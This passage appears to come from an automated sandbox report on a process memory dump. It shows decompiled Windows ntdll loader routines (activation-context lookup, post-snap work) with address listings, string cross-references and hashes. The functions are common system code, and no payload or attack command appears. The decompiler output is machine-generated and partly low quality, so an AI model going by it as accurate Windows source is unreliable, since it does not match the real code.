									L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E033EBB40(_t257,  &_v68, _t243);
								if(L033B43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E033F1370(_t278, 0x3384e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L033C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E033EF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E033F1370(_v16, 0x3384e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E033EBB40(_t262,  &_v68, _t244);
								if(L033B43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E033F1370(_t282, 0x3384e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E033EBB40(_t262,  &_v68, _t201);
							if(L033B43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L033C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E033EF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E033F1370(_t280, 0x3384e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E033EBB40(_t267,  &_v68, _t245);
							if(L033B43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E033F1370(_t284, 0x3384e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E033EBB40(_t267,  &_v68, _t224);
						if(L033B43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                          0x033b3d3c
                                          0x033b3d42
                                          0x033b3d44
                                          0x033b3d46
                                          0x033b3d49
                                          0x033b3d4c
                                          0x033b3d4f
                                          0x033b3d52
                                          0x033b3d55
                                          0x033b3d58
                                          0x033b3d5b
                                          0x033b3d5f
                                          0x033b3d61
                                          0x033b3d66
                                          0x03408213
                                          0x03408218
                                          0x033b4085
                                          0x033b4088
                                          0x033b408e
                                          0x033b4094
                                          0x033b409a
                                          0x033b40a0
                                          0x033b40a6
                                          0x033b40a9
                                          0x033b40af
                                          0x033b40b6
                                          0x033b40bd
                                          0x033b40bd
                                          0x033b3d83
                                          0x0340821f
                                          0x03408229
                                          0x03408238
                                          0x03408238
                                          0x0340823d
                                          0x0340823d
                                          0x033b3da0
                                          0x033b3daf
                                          0x033b3db5
                                          0x033b3dba
                                          0x033b3dba
                                          0x033b3dd4
                                          0x033b3e94
                                          0x033b3eab
                                          0x033b3f6d
                                          0x033b3f84
                                          0x033b406b
                                          0x033b406b
                                          0x033b406e
                                          0x033b406e
                                          0x033b4070
                                          0x033b4074
                                          0x03408351
                                          0x03408351
                                          0x033b407a
                                          0x033b407f
                                          0x0340835d
                                          0x03408370
                                          0x03408377
                                          0x03408379
                                          0x0340837c
                                          0x0340837c
                                          0x0340835d
                                          0x00000000
                                          0x033b407f
                                          0x033b3f8a
                                          0x033b3f8d
                                          0x033b3f90
                                          0x033b3f95
                                          0x0340830d
                                          0x0340830f
                                          0x033b3f9b
                                          0x033b3fac
                                          0x033b3fae
                                          0x033b3fb1
                                          0x033b3fb1
                                          0x033b3fb6
                                          0x03408317
                                          0x0340831a
                                          0x00000000
                                          0x033b3fbc
                                          0x033b3fc1
                                          0x033b3fc9
                                          0x033b3fd7
                                          0x033b3fda
                                          0x033b3fdd
                                          0x033b4021
                                          0x033b4021
                                          0x033b4029
                                          0x033b4030
                                          0x033b4044
                                          0x033b4046
                                          0x033b4046
                                          0x033b4044
                                          0x033b4049
                                          0x03408327
                                          0x03408334
                                          0x03408339
                                          0x0340833c
                                          0x033b404f
                                          0x033b404f
                                          0x033b404f
                                          0x033b4051
                                          0x033b4056
                                          0x033b4063
                                          0x033b4063
                                          0x033b4068
                                          0x00000000
                                          0x033b4068
                                          0x033b3fdf
                                          0x033b3fe2
                                          0x033b3fe4
                                          0x033b3fe7
                                          0x033b3fef
                                          0x033b4003
                                          0x033b4005
                                          0x033b4005
                                          0x033b400c
                                          0x033b4013
                                          0x033b4016
                                          0x033b4017
                                          0x033b401b
                                          0x033b401e
                                          0x00000000
                                          0x033b401e
                                          0x033b3fb6
                                          0x033b3eb1
                                          0x033b3eb4
                                          0x033b3eb7
                                          0x033b3ebc
                                          0x034082a9
                                          0x034082ab
                                          0x033b3ec2
                                          0x033b3ed3
                                          0x033b3ed5
                                          0x033b3ed8
                                          0x033b3ed8
                                          0x033b3edd
                                          0x034082b3
                                          0x034082b6
                                          0x00000000
                                          0x033b3ee3
                                          0x033b3ee8
                                          0x033b3eed
                                          0x033b3ef0
                                          0x033b3ef3
                                          0x033b3f02
                                          0x033b3f05
                                          0x033b3f08
                                          0x034082c0
                                          0x034082c3
                                          0x034082c5
                                          0x034082c8
                                          0x034082d0
                                          0x034082e4
                                          0x034082e6
                                          0x034082e6
                                          0x034082ed
                                          0x034082f4
                                          0x034082f7
                                          0x034082f8
                                          0x034082fc
                                          0x034082ff
                                          0x034082ff
                                          0x033b3f0e
                                          0x033b3f11
                                          0x033b3f16
                                          0x033b3f1d
                                          0x033b3f31
                                          0x03408307
                                          0x03408307
                                          0x033b3f31
                                          0x033b3f39
                                          0x033b3f48
                                          0x033b3f4d
                                          0x033b3f50
                                          0x033b3f50
                                          0x033b3f53
                                          0x033b3f58
                                          0x033b3f65
                                          0x033b3f65
                                          0x033b3f6a
                                          0x00000000
                                          0x033b3f6a
                                          0x033b3edd
                                          0x033b3dda
                                          0x033b3ddd
                                          0x033b3de0
                                          0x033b3de5
                                          0x03408245
                                          0x033b3deb
                                          0x033b3df7
                                          0x033b3dfc
                                          0x033b3dfe
                                          0x033b3e01
                                          0x033b3e01
                                          0x033b3e06
                                          0x0340824d
                                          0x0340824f
                                          0x03408254
                                          0x00000000
                                          0x033b3e0c
                                          0x033b3e11
                                          0x033b3e16
                                          0x033b3e19
                                          0x033b3e29
                                          0x033b3e2c
                                          0x033b3e2f
                                          0x0340825c
                                          0x0340825f
                                          0x03408261
                                          0x03408264
                                          0x0340826c
                                          0x03408280
                                          0x03408282
                                          0x03408282
                                          0x03408289
                                          0x03408290
                                          0x03408293
                                          0x03408294
                                          0x03408298
                                          0x0340829b
                                          0x0340829b
                                          0x033b3e35
                                          0x033b3e38
                                          0x033b3e3d
                                          0x033b3e44
                                          0x033b3e58
                                          0x034082a3
                                          0x034082a3
                                          0x033b3e58
                                          0x033b3e60
                                          0x033b3e6f
                                          0x033b3e74
                                          0x033b3e77
                                          0x033b3e77
                                          0x033b3e7a
                                          0x033b3e7f
                                          0x033b3e8c
                                          0x033b3e8c
                                          0x033b3e91
                                          0x00000000
                                          0x033b3e91

                                          Strings
                                          • Kernel-MUI-Number-Allowed, xrefs: 033B3D8C
                                          • Kernel-MUI-Language-SKU, xrefs: 033B3F70
                                          • WindowsExcludedProcs, xrefs: 033B3D6F
                                          • Kernel-MUI-Language-Allowed, xrefs: 033B3DC0
                                          • Kernel-MUI-Language-Disallowed, xrefs: 033B3E97
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: adbd74d078e03cff3923058beae564260b9f374a227f048f94d9291227c98e0d
                                          • Instruction ID: 589d15dd0636439aeb4bf731580dfd080fe2a5bcf405fa8dd5828f6b06a79f05
                                          • Opcode Fuzzy Hash: adbd74d078e03cff3923058beae564260b9f374a227f048f94d9291227c98e0d
                                          • Instruction Fuzzy Hash: 5FF15E76D10219EFCB11DF99C980AEEFBBDFF48650F14006AE905AB651E7349E01CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E033D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x349d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3498464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3495780 & 0x00000003) != 0) {
							E03425510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3495780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E033EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3497984; // 0x2f42d80
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3498464; // 0x75150110
					 *0x349b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E033D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3495780 & 0x00000005) != 0) {
						_push(_t49);
						E03425510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                          0x033d8e0f
                                          0x033d8e16
                                          0x033d8e19
                                          0x033d8e1b
                                          0x033d8e21
                                          0x033d8e7f
                                          0x033d8e85
                                          0x03419354
                                          0x0341936c
                                          0x03419371
                                          0x0341937b
                                          0x03419381
                                          0x03419381
                                          0x0341937b
                                          0x033d8e9d
                                          0x033d8e9d
                                          0x033d8e29
                                          0x033d8e2c
                                          0x033d8e38
                                          0x033d8e3e
                                          0x033d8e43
                                          0x033d8eb5
                                          0x033d8eb9
                                          0x034192aa
                                          0x034192af
                                          0x034192e8
                                          0x034192e8
                                          0x034192af
                                          0x033d8eb9
                                          0x033d8e45
                                          0x033d8e53
                                          0x033d8e5b
                                          0x033d8e5f
                                          0x033d8e78
                                          0x033d8e78
                                          0x033d8e7d
                                          0x033d8ec3
                                          0x033d8ecd
                                          0x033d8ed2
                                          0x033d8ed2
                                          0x033d8ec5
                                          0x033d8ec5
                                          0x00000000
                                          0x033d8e7d
                                          0x033d8e67
                                          0x033d8ea4
                                          0x0341931a
                                          0x00000000
                                          0x00000000
                                          0x03419320
                                          0x033d8ea4
                                          0x033d8e70
                                          0x03419325
                                          0x03419340
                                          0x03419345
                                          0x03419345
                                          0x033d8e76
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0341932A
                                          • LdrpFindDllActivationContext, xrefs: 03419331, 0341935D
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 03419357
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 0341933B, 03419367
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 0-3779518884
                                          • Opcode ID: 351b71ce7b8ad04da2512dd082c14c74f8a8ac62be0533d8b7463ca987b7d3be
                                          • Instruction ID: 19cd970a96415edd59d8557bbac598f7d7af3844658fd9bb10def8aeefd07708
                                          • Opcode Fuzzy Hash: 351b71ce7b8ad04da2512dd082c14c74f8a8ac62be0533d8b7463ca987b7d3be
                                          • Instruction Fuzzy Hash: EA41F933A003159EDB35FB18ACC9A39F6B8AB05644F0D45AAE4146F571E770BD808AC3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033B8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E033B8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E033B934A() != 0) {
								_t159 = E0342A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3495780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03425510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3495780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E033B849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E033B8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E033B8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3495c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3495c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E033C2280(_t92, 0x34986cc);
															_t94 = E03479DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E033D61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3495c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E033B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3495c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3495c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E033EF380(_t136, 0x3381184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E033C2280(_t108, 0x34986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E033D61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03479D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E033BFFB0(_t118, _t156, 0x34986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E033E9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                          0x033b8799
                                          0x033b879d
                                          0x033b87a1
                                          0x033b87a3
                                          0x033b87a8
                                          0x033b87c3
                                          0x033b87c3
                                          0x033b87c8
                                          0x033b87d1
                                          0x033b87d4
                                          0x033b87d8
                                          0x033b87e5
                                          0x033b87ec
                                          0x03409bfe
                                          0x03409c00
                                          0x03409c02
                                          0x03409c08
                                          0x03409c0d
                                          0x03409c0f
                                          0x03409c14
                                          0x03409c2d
                                          0x03409c32
                                          0x03409c37
                                          0x03409c3a
                                          0x03409c3c
                                          0x03409c42
                                          0x03409c42
                                          0x03409c3c
                                          0x03409c02
                                          0x033b87da
                                          0x033b87df
                                          0x033b87e3
                                          0x00000000
                                          0x00000000
                                          0x033b87e3
                                          0x033b87f2
                                          0x00000000
                                          0x033b87fb
                                          0x033b87fd
                                          0x033b87fe
                                          0x033b880e
                                          0x033b880f
                                          0x033b8810
                                          0x033b8814
                                          0x033b881a
                                          0x033b881c
                                          0x033b881f
                                          0x033b8821
                                          0x033b8822
                                          0x033b8824
                                          0x033b8826
                                          0x033b882c
                                          0x033b882e
                                          0x03409c48
                                          0x03409c48
                                          0x033b8834
                                          0x033b8834
                                          0x033b8837
                                          0x00000000
                                          0x00000000
                                          0x033b8837
                                          0x033b882e
                                          0x033b883d
                                          0x033b8840
                                          0x033b8843
                                          0x033b8846
                                          0x033b8849
                                          0x033b884c
                                          0x033b884e
                                          0x033b8850
                                          0x033b8852
                                          0x033b8854
                                          0x033b8857
                                          0x033b88b4
                                          0x033b88b6
                                          0x033b88b6
                                          0x033b8859
                                          0x033b8859
                                          0x033b8859
                                          0x033b8861
                                          0x033b8866
                                          0x033b886a
                                          0x033b893d
                                          0x033b8941
                                          0x00000000
                                          0x033b8947
                                          0x033b8947
                                          0x033b894a
                                          0x033b894c
                                          0x00000000
                                          0x033b8952
                                          0x033b8955
                                          0x033b895a
                                          0x033b895d
                                          0x033b895d
                                          0x033b895f
                                          0x033b8961
                                          0x033b8961
                                          0x033b8968
                                          0x00000000
                                          0x00000000
                                          0x033b896a
                                          0x033b896b
                                          0x033b896e
                                          0x00000000
                                          0x033b8970
                                          0x033b8970
                                          0x033b8970
                                          0x033b8970
                                          0x033b8972
                                          0x033b8972
                                          0x033b8974
                                          0x00000000
                                          0x033b897a
                                          0x033b897a
                                          0x033b897d
                                          0x00000000
                                          0x033b8983
                                          0x03409c65
                                          0x03409c6d
                                          0x03409c72
                                          0x03409c75
                                          0x03409c75
                                          0x03409c82
                                          0x03409c86
                                          0x03409c87
                                          0x03409c88
                                          0x03409c89
                                          0x03409c8c
                                          0x03409c90
                                          0x03409c95
                                          0x03409c97
                                          0x03409ca0
                                          0x03409ca3
                                          0x03409ca9
                                          0x03409ca9
                                          0x00000000
                                          0x03409ca9
                                          0x03409ca3
                                          0x00000000
                                          0x03409c97
                                          0x033b897d
                                          0x00000000
                                          0x033b8974
                                          0x033b8988
                                          0x033b8992
                                          0x033b8996
                                          0x00000000
                                          0x033b8996
                                          0x033b894c
                                          0x00000000
                                          0x033b8870
                                          0x033b887b
                                          0x033b887d
                                          0x033b887f
                                          0x033b8881
                                          0x033b8884
                                          0x033b8884
                                          0x033b8886
                                          0x033b8889
                                          0x033b888c
                                          0x033b888e
                                          0x033b8891
                                          0x033b8891
                                          0x033b8898
                                          0x00000000
                                          0x00000000
                                          0x033b889a
                                          0x033b889b
                                          0x033b889e
                                          0x00000000
                                          0x00000000
                                          0x033b88a0
                                          0x033b88a8
                                          0x033b88b0
                                          0x033b88b2
                                          0x033b88d3
                                          0x033b88d5
                                          0x00000000
                                          0x033b88d7
                                          0x033b88db
                                          0x033b88dc
                                          0x033b88e0
                                          0x033b88e8
                                          0x033b88ee
                                          0x033b88f0
                                          0x033b88f3
                                          0x033b88fc
                                          0x033b8901
                                          0x033b8906
                                          0x033b890c
                                          0x033b890c
                                          0x033b890f
                                          0x033b8916
                                          0x033b8917
                                          0x033b8918
                                          0x033b8919
                                          0x033b891a
                                          0x033b891f
                                          0x033b8921
                                          0x03409c52
                                          0x03409c55
                                          0x03409c5b
                                          0x03409cac
                                          0x03409cc0
                                          0x03409cc0
                                          0x03409c55
                                          0x033b8927
                                          0x033b8927
                                          0x033b892f
                                          0x033b8933
                                          0x00000000
                                          0x033b88f5
                                          0x033b88f5
                                          0x00000000
                                          0x033b88f7
                                          0x033b88f7
                                          0x033b88fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033b88fa
                                          0x033b88f5
                                          0x033b88f3
                                          0x00000000
                                          0x033b88d5
                                          0x00000000
                                          0x033b88b2
                                          0x033b88c9
                                          0x00000000
                                          0x033b88c9
                                          0x033b887f
                                          0x033b886a
                                          0x033b8857
                                          0x033b8852
                                          0x033b88bf
                                          0x033b88bf
                                          0x033b87aa
                                          0x033b87ad
                                          0x033b87ae
                                          0x033b87b4
                                          0x033b87b5
                                          0x033b87b6
                                          0x033b87b8
                                          0x033b87bd
                                          0x033b87c1
                                          0x033b87f4
                                          0x033b87fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033b87c1
                                          0x00000000

                                          Strings
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03409C18
                                          • LdrpDoPostSnapWork, xrefs: 03409C1E
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 03409C28
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          • Opcode ID: b3b6270811ddf2638bfac7566a84c4305c38c2a15fe3b32158704a97a786c9cd
                                          • Instruction ID: 5c100d170c80320bce0ebf021152703d1aae8a51c91de1cac68e8e027431f2c7
                                          • Opcode Fuzzy Hash: b3b6270811ddf2638bfac7566a84c4305c38c2a15fe3b32158704a97a786c9cd
                                          • Instruction Fuzzy Hash: DB91D131E00296DFDF18DF59C8C1AEAB3B9FF45315B1840AAEA15AFA51D730E901CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033B7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
